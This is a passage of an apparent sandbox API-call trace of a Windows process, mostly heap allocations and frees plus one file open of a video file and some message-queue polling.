RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0102.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0102.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0102.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0102.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cace8 [0102.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cace8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0102.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0102.116] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0102.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0102.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0102.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0102.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0102.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0102.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0102.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0102.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0102.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0102.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0102.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0102.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0102.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0102.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0102.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0102.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0102.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0102.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0102.117] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\IQ0I29Q qVTPWYuVmY.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\iq0i29q qvtpwyuvmy.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0102.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0102.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0102.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0102.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0102.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0102.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0102.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0102.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0102.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0102.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0102.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0102.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0102.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0102.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0102.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0102.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0102.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0102.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0102.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0102.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0102.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0102.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0102.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0102.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0102.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0102.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0102.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0102.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0102.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0102.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0102.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0102.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0102.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0102.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0102.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0102.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0102.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0102.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0102.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0102.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0102.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0102.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0102.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0102.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0102.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0102.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0102.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0102.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0102.118] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0102.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0102.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0102.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0102.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0102.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0102.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0102.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0102.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0102.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0102.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0102.119] FreeLibrary (hLibModule=0x772d0000) returned 1 [0102.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0102.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0102.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0102.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0102.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0102.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0102.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0102.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0102.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0102.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0102.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0102.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0102.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0102.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0102.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0102.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0102.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0102.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0102.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0102.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0102.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0102.121] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0102.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0102.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0102.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0102.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0102.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0102.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0102.121] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0102.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0102.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0102.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0102.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0102.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0102.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0102.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0102.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0102.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0102.122] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0102.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0102.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0102.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0102.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0102.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0102.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0102.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0102.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0102.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0102.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0102.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0102.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0102.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0102.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0102.124] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0102.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0102.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0102.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0102.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | 